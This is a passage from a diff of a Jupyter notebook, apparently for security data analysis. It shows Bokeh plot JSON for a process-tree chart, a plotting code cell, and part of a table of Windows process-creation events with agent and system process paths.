"type\":\"Rect\"},\"selection_glyph\":null,\"view\":{\"id\":\"1041\",\"type\":\"CDSView\"}},\"id\":\"1040\",\"type\":\"GlyphRenderer\"},{\"attributes\":{\"label\":{\"field\":\"Exe\"},\"renderers\":[{\"id\":\"1040\",\"type\":\"GlyphRenderer\"}]},\"id\":\"1048\",\"type\":\"LegendItem\"},{\"attributes\":{\"range\":{\"id\":\"1008\",\"type\":\"Range1d\"},\"value\":-0.2},\"id\":\"1050\",\"type\":\"Dodge\"},{\"attributes\":{\"range\":{\"id\":\"1008\",\"type\":\"Range1d\"},\"value\":0.25},\"id\":\"1064\",\"type\":\"Dodge\"},{\"attributes\":{\"data_source\":{\"id\":\"1002\",\"type\":\"ColumnDataSource\"},\"glyph\":{\"id\":\"1059\",\"type\":\"Text\"},\"hover_glyph\":null,\"muted_glyph\":null,\"nonselection_glyph\":{\"id\":\"1060\",\"type\":\"Text\"},\"selection_glyph\":null,\"view\":{\"id\":\"1062\",\"type\":\"CDSView\"}},\"id\":\"1061\",\"type\":\"GlyphRenderer\"},{\"attributes\":{\"source\":{\"id\":\"1002\",\"type\":\"ColumnDataSource\"}},\"id\":\"1062\",\"type\":\"CDSView\"},{\"attributes\":{},\"id\":\"1044\",\"type\":\"BasicTickFormatter\"},{\"attributes\":{\"fill_alpha\":{\"value\":0.6},\"fill_color\":{\"field\":\"Exe\",\"transform\":{\"id\":\"1035\",\"type\":\"CategoricalColorMapper\"}},\"height\":{\"units\":\"data\",\"value\":0.95},\"line_color\":{\"value\":\"#1f77b4\"},\"width\":{\"units\":\"data\",\"value\":3.5},\"x\":{\"field\":\"Level\",\"transform\":{\"id\":\"1036\",\"type\":\"Dodge\"}},\"y\":{\"field\":\"Row\"}},\"id\":\"1038\",\"type\":\"Rect\"},{\"attributes\":{\"text\":{\"field\":\"PID\"},\"text_baseline\":\"middle\",\"text_color\":{\"value\":\"black\"},\"text_font_size\":{\"value\":\"8pt\"},\"x\":{\"field\":\"Level\",\"transform\":{\"id\":\"1063\",\"type\":\"Dodge\"}},\"y\":{\"field\":\"Row\",\"transform\":{\"id\":\"1064\",\"type\":\"Dodge\"}}},\"id\":\"1066\",\"type\":\"Text\"},{\"attributes\":{\"fill_alpha\":{\"value\":0.1},\"fill_color\":{\"value\":\"#1f77b4\"},\"height\":{\"units\":\"data\",\"value\":0.95},\"line_alpha\":{\"value\":0.1},\"line_color\":{\"value\":\"#1f77b4\"},\"width\":{\"units\":\"data\",\"value\":3.5},\"x\":{\"field\":\"Level\",\"transform\":{\"id\":\"1036\",\"type\":\"Dodge\"}},\"y\":{\"field\":\"Row\"}},\"id\":\"1039\",\"type\":\"Rect\"},{\"attributes\":{},\"id\":\"1137\",\"type\":\"StringEditor\"},{\"attributes\":{\"range\":{\"id\":\"1006\",\"type\":\"Range1d\"},\"value\":0.1},\"id\":\"1049\",\"type\":\"Dodge\"},{\"attributes\":{\"active_drag\":\"auto\",\"active_inspect\":\"auto\",\"active_multi\":null,\"active_scroll\":\"auto\",\"active_tap\":\"auto\",\"tools\":[{\"id\":\"1024\",\"type\":\"PanTool\"},{\"id\":\"1025\",\"type\":\"ResetTool\"},{\"id\":\"1026\",\"type\":\"SaveTool\"},{\"id\":\"1027\",\"type\":\"TapTool\"},{\"id\":\"1033\",\"type\":\"HoverTool\"}]},\"id\":\"1028\",\"type\":\"Toolbar\"},{\"attributes\":{\"text\":{\"field\":\"PID\"},\"text_alpha\":{\"value\":0.1},\"text_baseline\":\"middle\",\"text_color\":{\"value\":\"black\"},\"text_font_size\":{\"value\":\"8pt\"},\"x\":{\"field\":\"Level\",\"transform\":{\"id\":\"1063\",\"type\":\"Dodge\"}},\"y\":{\"field\":\"Row\",\"transform\":{\"id\":\"1064\",\"type\":\"Dodge\"}}},\"id\":\"1067\",\"type\":\"Text\"},{\"attributes\":{\"below\":[{\"id\":\"1083\",\"type\":\"LinearAxis\"}],\"center\":[{\"id\":\"1087\",\"type\":\"Grid\"},{\"id\":\"1092\",\"type\":\"Grid\"}],\"left\":[{\"id\":\"1088\",\"type\":\"LinearAxis\"}],\"plot_height\":700,\"plot_width\":90,\"renderers\":[{\"id\":\"1110\",\"type\":\"GlyphRenderer\"}],\"title\":{\"id\":\"1135\",\"type\":\"Title\"},\"toolbar\":{\"id\":\"1099\",\"type\":\"Toolbar\"},\"x_range\":{\"id\":\"1075\",\"type\":\"DataRange1d\"},\"x_scale\":{\"id\":\"1079\",\"type\":\"LinearScale\"},\"y_range\":{\"id\":\"1077\",\"type\":\"Range1d\"},\"y_scale\":{\"id\":\"1081\",\"type\":\"LinearScale\"}},\"id\":\"1074\",\"subtype\":\"Figure\",\"type\":\"Plot\"},{\"attributes\":{\"data_source\":{\"id\":\"1002\",\"type\":\"ColumnDataSource\"},\"glyph\":{\"id\":\"1066\",\"type\":\"Text\"},\"hover_glyph\":null,\"muted_glyph\":null,\"nonselection_glyph\":{\"id\":\"1067\",\"type\":\"Text\"},\"selection_glyph\":null,\"view\":{\"id\":\"1069\",\"type\":\"CDSView\"}},\"id\":\"1068\",\"type\":\"GlyphRenderer\"},{\"attributes\":{\"text\":{\"field\":\"cmd\"},\"text_alpha\":{\"value\":0.1},\"text_baseline\":\"middle\",\"text_color\":{\"value\":\"black\"},\"text_font_size\":{\"value\":\"7pt\"},\"x\":{\"field\":\"Level\",\"transform\":{\"id\":\"1049\",\"type\":\"Dodge\"}},\"y\":{\"field\":\"Row\",\"transform\":{\"id\":\"1050\",\"type\":\"Dodge\"}}},\"id\":\"1053\",\"type\":\"Text\"},{\"attributes\":{\"source\":{\"id\":\"1002\",\"type\":\"ColumnDataSource\"}},\"id\":\"1069\",\"type\":\"CDSView\"},{\"attributes\":{},\"id\":\"1046\",\"type\":\"BasicTickFormatter\"},{\"attributes\":{\"editor\":{\"id\":\"1141\",\"type\":\"StringEditor\"},\"field\":\"SubjectLogonId\",\"formatter\":{\"id\":\"1142\",\"type\":\"StringFormatter\"},\"title\":\"SubjectLogonId\"},\"id\":\"1122\",\"type\":\"TableColumn\"},{\"attributes\":{\"callback\":null},\"id\":\"1075\",\"type\":\"DataRange1d\"},{\"attributes\":{\"editor\":{\"id\":\"1139\",\"type\":\"StringEditor\"},\"field\":\"SubjectUserSid\",\"formatter\":{\"id\":\"1140\",\"type\":\"StringFormatter\"},\"title\":\"SubjectUserSid\"},\"id\":\"1121\",\"type\":\"TableColumn\"},{\"attributes\":{\"ticks\":[1,2,3,4,5,6,7]},\"id\":\"1072\",\"type\":\"FixedTicker\"},{\"attributes\":{\"formatter\":{\"id\":\"1163\",\"type\":\"BasicTickFormatter\"},\"ticker\":{\"id\":\"1084\",\"type\":\"BasicTicker\"},\"visible\":false},\"id\":\"1083\",\"type\":\"LinearAxis\"},{\"attributes\":{\"editor\":{\"id\":\"1147\",\"type\":\"StringEditor\"},\"field\":\"CommandLine\",\"formatter\":{\"id\":\"1148\",\"type\":\"StringFormatter\"},\"title\":\"CommandLine\"},\"id\":\"1125\",\"type\":\"TableColumn\"},{\"attributes\":{\"ticks\":[1,2,3,4,5,6,7]},\"id\":\"1070\",\"type\":\"FixedTicker\"},{\"attributes\":{\"range\":{\"id\":\"1006\",\"type\":\"Range1d\"},\"value\":0.1},\"id\":\"1056\",\"type\":\"Dodge\"},{\"attributes\":{\"editor\":{\"id\":\"1143\",\"type\":\"StringEditor\"},\"field\":\"NewProcessId\",\"formatter\":{\"id\":\"1144\",\"type\":\"StringFormatter\"},\"title\":\"NewProcessId\"},\"id\":\"1123\",\"type\":\"TableColumn\"},{\"attributes\":{\"range\":{\"id\":\"1006\",\"type\":\"Range1d\"},\"value\":1.75},\"id\":\"1036\",\"type\":\"Dodge\"},{\"attributes\":{\"callback\":null,\"end\":1011,\"start\":-1},\"id\":\"1077\",\"type\":\"Range1d\"},{\"attributes\":{\"editor\":{\"id\":\"1145\",\"type\":\"StringEditor\"},\"field\":\"NewProcessName\",\"formatter\":{\"id\":\"1146\",\"type\":\"StringFormatter\"},\"title\":\"NewProcessName\"},\"id\":\"1124\",\"type\":\"TableColumn\"},{\"attributes\":{\"children\":[{\"id\":\"1003\",\"subtype\":\"Figure\",\"type\":\"Plot\"},{\"id\":\"1074\",\"subtype\":\"Figure\",\"type\":\"Plot\"}]},\"id\":\"1131\",\"type\":\"Row\"},{\"attributes\":{},\"id\":\"1079\",\"type\":\"LinearScale\"},{\"attributes\":{\"editor\":{\"id\":\"1149\",\"type\":\"StringEditor\"},\"field\":\"ProcessId\",\"formatter\":{\"id\":\"1150\",\"type\":\"StringFormatter\"},\"title\":\"ProcessId\"},\"id\":\"1126\",\"type\":\"TableColumn\"},{\"attributes\":{\"callback\":null},\"id\":\"1027\",\"type\":\"TapTool\"},{\"attributes\":{\"editor\":{\"id\":\"1151\",\"type\":\"StringEditor\"},\"field\":\"ParentProcessName\",\"formatter\":{\"id\":\"1152\",\"type\":\"StringFormatter\"},\"title\":\"ParentProcessName\"},\"id\":\"1127\",\"type\":\"TableColumn\"},{\"attributes\":{},\"id\":\"1081\",\"type\":\"LinearScale\"},{\"attributes\":{},\"id\":\"1026\",\"type\":\"SaveTool\"},{\"attributes\":{\"editor\":{\"id\":\"1153\",\"type\":\"StringEditor\"},\"field\":\"TargetLogonId\",\"formatter\":{\"id\":\"1154\",\"type\":\"StringFormatter\"},\"title\":\"TargetLogonId\"},\"id\":\"1128\",\"type\":\"TableColumn\"},{\"attributes\":{\"format\":\"%F %T\"},\"id\":\"1117\",\"type\":\"DateFormatter\"},{\"attributes\":{\"dimensions\":\"height\"},\"id\":\"1024\",\"type\":\"PanTool\"},{\"attributes\":{\"source\":{\"id\":\"1002\",\"type\":\"ColumnDataSource\"}},\"id\":\"1130\",\"type\":\"CDSView\"},{\"attributes\":{},\"id\":\"1025\",\"type\":\"ResetTool\"},{\"attributes\":{},\"id\":\"1084\",\"type\":\"BasicTicker\"},{\"attributes\":{\"grid_line_color\":null,\"ticker\":{\"id\":\"1084\",\"type\":\"BasicTicker\"}},\"id\":\"1087\",\"type\":\"Grid\"},{\"attributes\":{},\"id\":\"1089\",\"type\":\"BasicTicker\"},{\"attributes\":{\"dimension\":1,\"grid_line_color\":\"navy\",\"ticker\":{\"id\":\"1020\",\"type\":\"BasicTicker\"},\"visible\":false},\"id\":\"1023\",\"type\":\"Grid\"},{\"attributes\":{\"formatter\":{\"id\":\"1161\",\"type\":\"BasicTickFormatter\"},\"ticker\":{\"id\":\"1089\",\"type\":\"BasicTicker\"},\"visible\":false},\"id\":\"1088\",\"type\":\"LinearAxis\"},{\"attributes\":{\"callback\":null,\"formatters\":{\"TimeGenerated\":\"datetime\"},\"renderers\":[{\"id\":\"1040\",\"type\":\"GlyphRenderer\"}],\"tooltips\":[[\"Process\",\"@NewProcessName\"],[\"PID\",\"@PID\"],[\"CmdLine\",\"@CommandLine\"],[\"SubjUser\",\"@SubjectUserName\"],[\"SubjLgnId\",\"@SubjectLogonId\"],[\"TargLgnId\",\"@TargetLogonId\"],[\"Time\",\"@TimeGenerated{%F %T}\"]]},\"id\":\"1033\",\"type\":\"HoverTool\"},{\"attributes\":{\"active_drag\":\"auto\",\"active_inspect\":\"auto\",\"active_multi\":{\"id\":\"1112\",\"type\":\"RangeTool\"},\"active_scroll\":\"auto\",\"active_tap\":\"auto\",\"tools\":[{\"id\":\"1093\",\"type\":\"PanTool\"},{\"id\":\"1094\",\"type\":\"WheelZoomTool\"},{\"id\":\"1095\",\"type\":\"BoxZoomTool\"},{\"id\":\"1096\",\"type\":\"SaveTool\"},{\"id\":\"1097\",\"type\":\"ResetTool\"},{\"id\":\"1098\",\"type\":\"HelpTool\"},{\"id\":\"1112\",\"type\":\"RangeTool\"}]},\"id\":\"1099\",\"type\":\"Toolbar\"},{\"attributes\":{\"text\":\"\"},\"id\":\"1135\",\"type\":\"Title\"},{\"attributes\":{\"dimension\":1,\"grid_line_color\":null,\"ticker\":{\"id\":\"1089\",\"type\":\"BasicTicker\"}},\"id\":\"1092\",\"type\":\"Grid\"},{\"attributes\":{},\"id\":\"1142\",\"type\":\"StringFormatter\"},{\"attributes\":{},\"id\":\"1141\",\"type\":\"StringEditor\"},{\"attributes\":{\"factors\":[\"conhost.exe\",\"csc.exe\",\"rundll32.exe\",\"MsMpEng.exe\",\"UsoClient.exe\",\"wsqmcons.exe\",\"lodctr.exe\",\"reg.exe\",\"taskhostw.exe\",\"cmd.exe\",\"InstallAgent.exe\",\"GoogleUpdate.exe\",\"powershell.exe\",\"MOFWriter.exe\",\"suchost.exe\",\"wermgr.exe\",\"cacls.exe\",\"WerFault.exe\",\"cvtres.exe\",\"appidcertstorecheck.exe\",\"WMIADAP.exe\",\"MonitoringHost.exe\",\"wuauclt.exe\",\"cscript.exe\",\"PING.EXE\",\"Microsoft.Sirona.OMS.Security.BaselineAssessment.exe\",\"WmiPrvSE.exe\",\"WaSecAgentProv.exe\",\"svchost.exe\",\"SpeechModelDownload.exe\",\"MOMPerfSnapshotHelper.exe\",\"unlodctr.exe\",\"CompatTelRunner.exe\",\"WaAppAgent.exe\",\"sppsvc.exe\",\"CollectGuestLogs.exe\",\"AppHostRegistrationVerifier.exe\",\"MpCmdRun.exe\",\"dllhost.exe\",\"WmiApSrv.exe\",\"ASMHost.exe\",\"pmfexe.exe\",\"AM_Delta.exe\",\"MpSigStub.exe\",\"DeviceCensus.exe\",\"DscRun.exe\",\"netcfg.exe\",\"mpam-d3ea18d4.exe\",\"SecEdit.exe\",\"services.exe\"],\"palette\":[\"#440154\",\"#45085B\",\"#470F62\",\"#471669\",\"#481D6F\",\"#472575\",\"#472B7A\",\"#46317E\",\"#443781\",\"#423D84\",\"#404487\",\"#3D4A89\",\"#3B508A\",\"#39558B\",\"#365A8C\",\"#33608D\",\"#31658D\",\"#2F6A8D\",\"#2D6F8E\",\"#2B748E\",\"#287A8E\",\"#277E8E\",\"#25838D\",\"#23888D\",\"#218C8D\",\"#1F928C\",\"#1E978A\",\"#1E9B89\",\"#1EA087\",\"#20A585\",\"#24AA82\",\"#29AF7F\",\"#2FB37B\",\"#36B877\",\"#3EBC73\",\"#49C16D\",\"#53C567\",\"#5EC961\",\"#69CC5B\",\"#74D054\",\"#83D34B\",\"#90D643\",\"#9DD93A\",\"#AADB32\",\"#B7DD29\",\"#C7E01F\",\"#D4E11A\",\"#E1E318\",\"#EEE51B\",\"#FDE724\"]},\"id\":\"1035\",\"type\":\"CategoricalColorMapper\"},{\"attributes\":{\"grid_line_alpha\":0.1,\"grid_line_color\":\"navy\",\"minor_grid_line_alpha\":0.1,\"minor_grid_line_color\":\"navy\",\"ticker\":{\"id\":\"1072\",\"type\":\"FixedTicker\"}},\"id\":\"1018\",\"type\":\"Grid\"},{\"attributes\":{},\"id\":\"1140\",\"type\":\"StringFormatter\"},{\"attributes\":{\"fill_alpha\":{\"value\":0.1},\"fill_color\":{\"value\":\"#1f77b4\"},\"height\":{\"units\":\"data\",\"value\":0.8},\"line_alpha\":{\"value\":0.1},\"line_color\":{\"value\":\"#1f77b4\"},\"width\":{\"units\":\"data\",\"value\":1.2},\"x\":{\"field\":\"Level\",\"transform\":{\"id\":\"1106\",\"type\":\"Dodge\"}},\"y\":{\"field\":\"Row\"}},\"id\":\"1109\",\"type\":\"Rect\"},{\"attributes\":{\"below\":[{\"id\":\"1014\",\"type\":\"LinearAxis\"}],\"center\":[{\"id\":\"1018\",\"type\":\"Grid\"},{\"id\":\"1023\",\"type\":\"Grid\"},{\"id\":\"1047\",\"type\":\"Legend\"}],\"left\":[{\"id\":\"1019\",\"type\":\"LinearAxis\"}],\"outline_line_color\":{\"value\":null},\"plot_height\":700,\"plot_width\":900,\"renderers\":[{\"id\":\"1040\",\"type\":\"GlyphRenderer\"},{\"id\":\"1054\",\"type\":\"GlyphRenderer\"},{\"id\":\"1061\",\"type\":\"GlyphRenderer\"},{\"id\":\"1068\",\"type\":\"GlyphRenderer\"}],\"title\":{\"id\":\"1004\",\"type\":\"Title\"},\"toolbar\":{\"id\":\"1028\",\"type\":\"Toolbar\"},\"toolbar_location\":\"above\",\"x_range\":{\"id\":\"1006\",\"type\":\"Range1d\"},\"x_scale\":{\"id\":\"1010\",\"type\":\"LinearScale\"},\"y_range\":{\"id\":\"1008\",\"type\":\"Range1d\"},\"y_scale\":{\"id\":\"1012\",\"type\":\"LinearScale\"}},\"id\":\"1003\",\"subtype\":\"Figure\",\"type\":\"Plot\"},{\"attributes\":{\"axis_line_color\":{\"value\":null},\"formatter\":{\"id\":\"1044\",\"type\":\"BasicTickFormatter\"},\"major_label_standoff\":0,\"major_tick_line_color\":{\"value\":\"navy\"},\"ticker\":{\"id\":\"1020\",\"type\":\"BasicTicker\"},\"visible\":false},\"id\":\"1019\",\"type\":\"LinearAxis\"},{\"attributes\":{},\"id\":\"1143\",\"type\":\"StringEditor\"},{\"attributes\":{\"fill_alpha\":{\"value\":0.6},\"fill_color\":{\"field\":\"Exe\",\"transform\":{\"id\":\"1035\",\"type\":\"CategoricalColorMapper\"}},\"height\":{\"units\":\"data\",\"value\":0.8},\"line_color\":{\"value\":\"#1f77b4\"},\"width\":{\"units\":\"data\",\"value\":1.2},\"x\":{\"field\":\"Level\",\"transform\":{\"id\":\"1106\",\"type\":\"Dodge\"}},\"y\":{\"field\":\"Row\"}},\"id\":\"1108\",\"type\":\"Rect\"},{\"attributes\":{\"fill_alpha\":{\"value\":0.2},\"fill_color\":{\"value\":\"navy\"},\"level\":\"overlay\",\"line_alpha\":{\"value\":1.0},\"line_color\":{\"value\":\"black\"},\"line_dash\":[2,2],\"line_width\":{\"value\":0.5}},\"id\":\"1113\",\"type\":\"BoxAnnotation\"},{\"attributes\":{},\"id\":\"1144\",\"type\":\"StringFormatter\"},{\"attributes\":{},\"id\":\"1093\",\"type\":\"PanTool\"},{\"attributes\":{},\"id\":\"1094\",\"type\":\"WheelZoomTool\"},{\"attributes\":{},\"id\":\"1145\",\"type\":\"StringEditor\"},{\"attributes\":{\"overlay\":{\"id\":\"1165\",\"type\":\"BoxAnnotation\"}},\"id\":\"1095\",\"type\":\"BoxZoomTool\"},{\"attributes\":{},\"id\":\"1020\",\"type\":\"BasicTicker\"},{\"attributes\":{},\"id\":\"1096\",\"type\":\"SaveTool\"},{\"attributes\":{},\"id\":\"1146\",\"type\":\"StringFormatter\"},{\"attributes\":{},\"id\":\"1098\",\"type\":\"HelpTool\"},{\"attributes\":{},\"id\":\"1147\",\"type\":\"StringEditor\"},{\"attributes\":{},\"id\":\"1097\",\"type\":\"ResetTool\"},{\"attributes\":{},\"id\":\"1012\",\"type\":\"LinearScale\"},{\"attributes\":{},\"id\":\"1148\",\"type\":\"StringFormatter\"},{\"attributes\":{\"axis_line_color\":{\"value\":null},\"formatter\":{\"id\":\"1046\",\"type\":\"BasicTickFormatter\"},\"major_label_standoff\":0,\"major_tick_line_color\":{\"value\":\"navy\"},\"ticker\":{\"id\":\"1070\",\"type\":\"FixedTicker\"},\"visible\":false},\"id\":\"1014\",\"type\":\"LinearAxis\"},{\"attributes\":{},\"id\":\"1149\",\"type\":\"StringEditor\"},{\"attributes\":{},\"id\":\"1010\",\"type\":\"LinearScale\"},{\"attributes\":{\"overlay\":{\"id\":\"1113\",\"type\":\"BoxAnnotation\"},\"x_range\":null,\"y_range\":{\"id\":\"1008\",\"type\":\"Range1d\"}},\"id\":\"1112\",\"type\":\"RangeTool\"},{\"attributes\":{},\"id\":\"1150\",\"type\":\"StringFormatter\"},{\"attributes\":{\"source\":{\"id\":\"1002\",\"type\":\"ColumnDataSource\"}},\"id\":\"1041\",\"type\":\"CDSView\"},{\"attributes\":{},\"id\":\"1151\",\"type\":\"StringEditor\"},{\"attributes\":{\"columns\":[{\"id\":\"1118\",\"type\":\"TableColumn\"},{\"id\":\"1120\",\"type\":\"TableColumn\"},{\"id\":\"1121\",\"type\":\"TableColumn\"},{\"id\":\"1122\",\"type\":\"TableColumn\"},{\"id\":\"1123\",\"type\":\"TableColumn\"},{\"id\":\"1124\",\"type\":\"TableColumn\"},{\"id\":\"1125\",\"type\":\"TableColumn\"},{\"id\":\"1126\",\"type\":\"TableColumn\"},{\"id\":\"1127\",\"type\":\"TableColumn\"},{\"id\":\"1128\",\"type\":\"TableColumn\"}],\"height\":150,\"source\":{\"id\":\"1002\",\"type\":\"ColumnDataSource\"},\"view\":{\"id\":\"1130\",\"type\":\"CDSView\"},\"width\":950},\"id\":\"1129\",\"type\":\"DataTable\"},{\"attributes\":{\"data_source\":{\"id\":\"1002\",\"type\":\"ColumnDataSource\"},\"glyph\":{\"id\":\"1108\",\"type\":\"Rect\"},\"hover_glyph\":null,\"muted_glyph\":null,\"nonselection_glyph\":{\"id\":\"1109\",\"type\":\"Rect\"},\"selection_glyph\":null,\"view\":{\"id\":\"1111\",\"type\":\"CDSView\"}},\"id\":\"1110\",\"type\":\"GlyphRenderer\"},{\"attributes\":{},\"id\":\"1152\",\"type\":\"StringFormatter\"},{\"attributes\":{\"source\":{\"id\":\"1002\",\"type\":\"ColumnDataSource\"}},\"id\":\"1111\",\"type\":\"CDSView\"},{\"attributes\":{},\"id\":\"1153\",\"type\":\"StringEditor\"},{\"attributes\":{},\"id\":\"1154\",\"type\":\"StringFormatter\"},{\"attributes\":{\"range\":null,\"value\":-0.5},\"id\":\"1106\",\"type\":\"Dodge\"},{\"attributes\":{},\"id\":\"1155\",\"type\":\"Selection\"},{\"attributes\":{\"text\":\"ProcessTree\"},\"id\":\"1004\",\"type\":\"Title\"},{\"attributes\":{\"callback\":null,\"end\":1011,\"start\":990},\"id\":\"1008\",\"type\":\"Range1d\"},{\"attributes\":{},\"id\":\"1156\",\"type\":\"UnionRenderers\"},{\"attributes\":{\"editor\":{\"id\":\"1136\",\"type\":\"StringEditor\"},\"field\":\"TimeGenerated\",\"formatter\":{\"id\":\"1117\",\"type\":\"DateFormatter\"},\"title\":\"TimeGenerated\"},\"id\":\"1118\",\"type\":\"TableColumn\"},{\"attributes\":{\"editor\":{\"id\":\"1137\",\"type\":\"StringEditor\"},\"field\":\"SubjectUserName\",\"formatter\":{\"id\":\"1138\",\"type\":\"StringFormatter\"},\"title\":\"SubjectUserName\"},\"id\":\"1120\",\"type\":\"TableColumn\"},{\"attributes\":{\"callback\":null,\"end\":10,\"start\":1},\"id\":\"1006\",\"type\":\"Range1d\"}],\"root_ids\":[\"1132\"]},\"title\":\"Bokeh Application\",\"version\":\"1.4.0\"}};\n  var render_items = [{\"docid\":\"5635a785-c54a-48f1-a6d1-7fb099a1d973\",\"roots\":{\"1132\":\"81fddc03-103b-4116-8b3d-8c51c88e70df\"}}];\n  root.Bokeh.embed.embed_items_notebook(docs_json, render_items);\n\n  }\n  if (root.Bokeh !== undefined) {\n    embed_document(root);\n  } else {\n    var attempts = 0;\n    var timer = setInterval(function(root) {\n      if (root.Bokeh !== undefined) {\n        clearInterval(timer);\n        embed_document(root);\n      } else {\n        attempts++;\n        if (attempts > 100) {\n          clearInterval(timer);\n          console.log(\"Bokeh: ERROR: Unable to run BokehJS code because BokehJS library is missing\");\n        }\n      }\n    }, 10, root)\n  }\n})(window);",
+        "application/vnd.bokehjs_exec.v0+json": ""
+       },
+       "metadata": {
+        "application/vnd.bokehjs_exec.v0+json": {
+         "id": "1132"
+        }
+       },
+       "output_type": "display_data"
+      }
+     ],
+     "persistentId": "56ffc00b-0809-4b5f-b6b9-bec57f7e8332",
+     "text": "assert len(ptutil.get_roots(p_tree)) == 10\ns_tree = ptutil.get_descendents(p_tree, ptutil.get_roots(p_tree).iloc[4])\nptplot.plot_tree(data=p_tree, legend_col=\"Exe\")"
+    },
+    "executionTime": "2019-12-13T20:27:51.773Z"
+   },
+   {
+    "cell": {
+     "executionCount": 5,
+     "executionEventId": "a3e7c24b-a363-4dfd-a80b-e9505226b6ce",
+     "hasError": false,
+     "id": "5610ff3a-83b0-4253-92bb-feba160df533",
+     "outputs": [
+      {
+       "data": {
+        "text/html": "<div>\n<style scoped>\n    .dataframe tbody tr th:only-of-type {\n        vertical-align: middle;\n    }\n\n    .dataframe tbody tr th {\n        vertical-align: top;\n    }\n\n    .dataframe thead th {\n        text-align: right;\n    }\n</style>\n<table border=\"1\" class=\"dataframe\">\n  <thead>\n    <tr style=\"text-align: right;\">\n      <th></th>\n      <th>TenantId</th>\n      <th>Account</th>\n      <th>EventID</th>\n      <th>TimeGenerated</th>\n      <th>Computer</th>\n      <th>SubjectUserSid</th>\n      <th>SubjectUserName</th>\n      <th>SubjectDomainName</th>\n      <th>SubjectLogonId</th>\n      <th>NewProcessId</th>\n      <th>...</th>\n      <th>source_index_par</th>\n      <th>ProcessId_par</th>\n      <th>NewProcessName_par</th>\n      <th>TimeGenerated_orig_par</th>\n      <th>parent_key</th>\n      <th>IsRoot</th>\n      <th>IsLeaf</th>\n      <th>IsBranch</th>\n      <th>path</th>\n      <th>parent_index</th>\n    </tr>\n    <tr>\n      <th>proc_key</th>\n      <th></th>\n      <th></th>\n      <th></th>\n      <th></th>\n      <th></th>\n      <th></th>\n      <th></th>\n      <th></th>\n      <th></th>\n      <th></th>\n      <th></th>\n      <th></th>\n      <th></th>\n      <th></th>\n      <th></th>\n      <th></th>\n      <th></th>\n      <th></th>\n      <th></th>\n      <th></th>\n      <th></th>\n    </tr>\n  </thead>\n  <tbody>\n    <tr>\n      <th>c:\\program files\\microsoft monitoring agent\\agent\\monitoringhost.exe0x8641970-01-01 00:00:00.000000</th>\n      <td>52b1ab41-869e-4138-9e40-2a4457f09bf0</td>\n      <td>NaN</td>\n      <td>4688</td>\n      <td>1970-01-01 00:00:00.000</td>\n      <td>MSTICAlertsWin1</td>\n      <td>NaN</td>\n      <td>NaN</td>\n      <td>NaN</td>\n      <td>0x3e7</td>\n      <td>0x864</td>\n      <td>...</td>\n      <td>NaN</td>\n      <td>NaN</td>\n      <td>NaN</td>\n      <td>NaT</td>\n      <td>NaN</td>\n      <td>True</td>\n      <td>False</td>\n      <td>False</td>\n      <td>1004</td>\n      <td>NaN</td>\n    </tr>\n    <tr>\n      <th>c:\\program files\\microsoft monitoring agent\\agent\\health service state\\ict 2\\cmf\\desiredstateconfiguration\\dscrun.exe0x8dc2019-02-09 21:02:56.257000</th>\n      <td>52b1ab41-869e-4138-9e40-2a4457f09bf0</td>\n      <td>WORKGROUP\\MSTICAlertsWin1$</td>\n      <td>4688</td>\n      <td>2019-02-09 21:02:56.257</td>\n      <td>MSTICAlertsWin1</td>\n      <td>S-1-5-18</td>\n      <td>MSTICAlertsWin1$</td>\n      <td>WORKGROUP</td>\n      <td>0x3e7</td>\n      <td>0x8dc</td>\n      <td>...</td>\n      <td>NaN</td>\n      <td>NaN</td>\n      <td>NaN</td>\n      <td>1970-01-01 00:00:00.000000000</td>\n      <td>c:\\program files\\microsoft monitoring agent\\ag...</td>\n      <td>False</td>\n      <td>False</td>\n      <td>True</td>\n      <td>1004/10</td>\n      <td>1004</td>\n    </tr>\n    <tr>\n      <th>c:\\windows\\system32\\conhost.exe0x183c2019-02-09 21:02:56.273000</th>\n      <td>52b1ab41-869e-4138-9e40-2a4457f09bf0</td>\n      <td>WORKGROUP\\MSTICAlertsWin1$</td>\n      <td>4688</td>\n      <td>2019-02-09 21:02:56.273</td>\n      <td>MSTICAlertsWin1</td>\n      <td>S-1-5-18</td>\n      <td>MSTICAlertsWin1$</td>\n      <td>WORKGROUP</td>\n      <td>0x3e7</td>\n      <td>0x183c</td>\n      <td>...</td>\n      <td>998.0</td>\n      <td>0x864</td>\n      <td>C:\\Program Files\\Microsoft Monitoring Agent\\Ag...</td>\n      <td>2019-02-09 21:02:56.256999936</td>\n      <td>c:\\program files\\microsoft monitoring agent\\ag...</td>\n      <td>False</td>\n      <td>True</td>\n      <td>False</td>\n      <td>1004/10/11</td>\n      <td>10</td>\n    </tr>\n    <tr>\n      <th>c:\\program files\\microsoft monitoring agent\\agent\\health service state\\ict 2\\cmf-64\\desiredstateconfiguration\\dscrun.exe0xd742019-02-09 23:22:56.257000</th>\n      <td>52b1ab41-869e-4138-9e40-2a4457f09bf0</td>\n      <td>WORKGROUP\\MSTICAlertsWin1$</td>\n      <td>4688</td>\n      <td>2019-02-09 23:22:56.257</td>\n      <td>MSTICAlertsWin1</td>\n      <td>S-1-5-18</td>\n      <td>MSTICAlertsWin1$</td>\n      <td>WORKGROUP</td>\n      <td>0x3e7</td>\n      <td>0xd74</td>\n      <td>...</td>\n      <td>NaN</td>\n      <td>NaN</td>\n      <td>NaN</td>\n      <td>1970-01-01 00:00:00.000000000</td>\n      <td>c:\\program files\\microsoft monitoring agent\\ag...</td>\n      <td>False</td>\n      <td>False</td>\n      <td>True</td>\n      <td>1004/107</td>\n      <td>1004</td>\n    </tr>\n    <tr>\n      <th>c:\\windows\\system32\\conhost.exe0x21c82019-02-09 23:22:56.267000</th>\n      <td>52b1ab41-869e-4138-9e40-2a4457f09bf0</td>\n      <td>WORKGROUP\\MSTICAlertsWin1$</td>\n      <td>4688</td>\n      <td>2019-02-09 23:22:56.267</td>\n      <td>MSTICAlertsWin1</td>\n      <td>S-1-5-18</td>\n      <td>MSTICAlertsWin1$</td>\n      <td>WORKGROUP</td>\n      <td>0x3e7</td>\n      <td>0x21c8</td>\n      <td>...</td>\n      <td>749.0</td>\n      <td>0x864</td>\n      <td>C:\\Program Files\\Microsoft Monitoring Agent\\Ag...</td>\n      <td>2019-02-09 23:22:56.256999936</td>\n      <td>c:\\program files\\microsoft monitoring agent\\ag...</td>\n      <td>False</td>\n      <td>True</td>\n      <td>False</td>\n      <td>1004/107/108</td>\n      <td>107</td>\n    </tr>\n    <tr>\n      <th>c:\\program files\\microsoft monitoring agent\\agent\\health service state\\ict 